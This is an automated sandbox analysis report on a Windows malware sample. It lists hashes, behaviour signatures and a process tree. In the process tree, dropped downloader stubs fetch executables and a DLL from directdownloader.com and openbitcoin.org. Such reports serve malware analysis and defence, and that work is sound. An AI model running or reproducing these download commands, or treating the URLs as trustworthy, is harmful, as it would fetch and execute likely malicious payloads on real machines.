Analysis

  • max time kernel
    0s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31/12/2023, 04:44

General

  • Target

    28ac188adae3e90b506898cc9fab4699.exe

  • Size

    492KB

  • MD5

    28ac188adae3e90b506898cc9fab4699

  • SHA1

    4f31e191eaf870d9971ddde8d339430ebf6381ab

  • SHA256

    47b4d7f0e8fbacadab4dd8259443904935e38cc89abe7f10c9d8d9b2950c6f16

  • SHA512

    31bf9c81191e38fd89d89b024e0a1835a6c72fe6337395636b674858fe05e976fa84b53405e9420698236e3a0724dd2f12cac3443ac708b331c991ecdadef025

  • SSDEEP

    6144:Cuk4fqjksQqF6jtY03ZgLpp6TURimpBwXVUTL7E97IkXQxBRUoz0JehYvH7Aw0v9:44fwX6peEUBwXVwM9vylzdYvH7AwC

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\28ac188adae3e90b506898cc9fab4699.exe
    "C:\Users\Admin\AppData\Local\Temp\28ac188adae3e90b506898cc9fab4699.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4988
    • C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\preinstaller.exe
      C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\preinstaller.exe 0 "Type_o_negative-the_best_of_type_o_negative-cd-2006-qtxmp3" "Download"
      2⤵
      • Executes dropped EXE
      PID:4432
    • C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\downloaderOFFER0.exe
      C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\downloaderOFFER0.exe /U "http://www.directdownloader.com/toolbars/optimizer.exe" /D "C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\optimizer.exe"
      2⤵
      • Executes dropped EXE
      PID:2052
    • C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\downloaderDDLR.exe
      C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\downloaderDDLR.exe /U "http://www.directdownloader.com/DirectDownloaderInstaller.exe" /D "C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\DirectDownloaderInstaller.exe"
      2⤵
      • Executes dropped EXE
      PID:4248
    • C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\downloaderSTUB.exe
      C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\downloaderSTUB.exe /U "http://openbitcoin.org/static/dist/updater.exe" /D "C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\updater.exe"
      2⤵
      • Executes dropped EXE
      PID:232
    • C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\downloaderSTUB.exe
      C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\downloaderSTUB.exe /U "http://openbitcoin.org/static/dist/OpenCL.dll" /D "C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\OpenCL.dll"
      2⤵
      • Executes dropped EXE
      PID:2380
    • C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\downloaderSTUB.exe
      C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\downloaderSTUB.exe /U "http://www.openbitcoin.org/static/dist/obc.exe" /D "C:\Users\Admin\AppData\Local\Temp\bef073723c45ea73f45ee509cd2846f0\stub.exe"
      2⤵
      • Executes dropped EXE
      PID:5004

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/4432-46-0x0000000000400000-0x000000000043F000-memory.dmp

          Filesize

          252KB

        • memory/4988-45-0x0000000000400000-0x0000000000444000-memory.dmp

          Filesize

          272KB